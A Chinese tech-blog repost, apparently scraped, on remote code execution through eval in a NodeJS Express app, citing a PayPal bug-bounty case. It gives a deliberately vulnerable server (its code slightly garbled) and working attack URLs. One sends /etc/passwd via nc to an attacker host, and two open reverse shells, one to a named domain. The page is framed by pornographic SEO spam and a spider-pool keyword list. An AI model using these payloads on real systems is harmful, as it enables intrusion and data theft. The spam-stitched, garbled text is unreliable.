国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 編程 > JavaScript > 正文

NodeJS遠程代碼執(zhí)行

2019-11-20 09:08:23
字體:
來源:轉載
供稿:網友

背景

@Artsploit在挖PayPal的漏洞時,發(fā)現一處NodeJS代碼執(zhí)行,獎勵$10000美金。

測試

var express = require('express'); var app = express(); app.get('/', function (req, res) {   res.send('Hello eval(req.query.q));  console.log(req.query.q);});app.listen(8080, function () {   console.log('Example listening on port 8080!');});

任意文件讀取

http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')

GET SHELL

http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

GET SHELL2

http://host:8080/?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/wufeifei.com/7890 0>%261"')

發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
主站蜘蛛池模板: 新郑市| 保靖县| 曲麻莱县| 绥芬河市| 梅州市| 甘泉县| 南召县| 乐都县| 浙江省| 福安市| 长岛县| 宜兴市| 积石山| 黑龙江省| 巩留县| 龙门县| 巴楚县| 景德镇市| 司法| 从化市| 化隆| 天津市| 丽水市| 大新县| 渭南市| 东光县| 七台河市| 巴里| 潜山县| 磐石市| 孝义市| 静乐县| 韶关市| 寿阳县| 阜宁县| 浦县| 寻甸| 哈尔滨市| 阿拉尔市| 涿鹿县| 平阳县|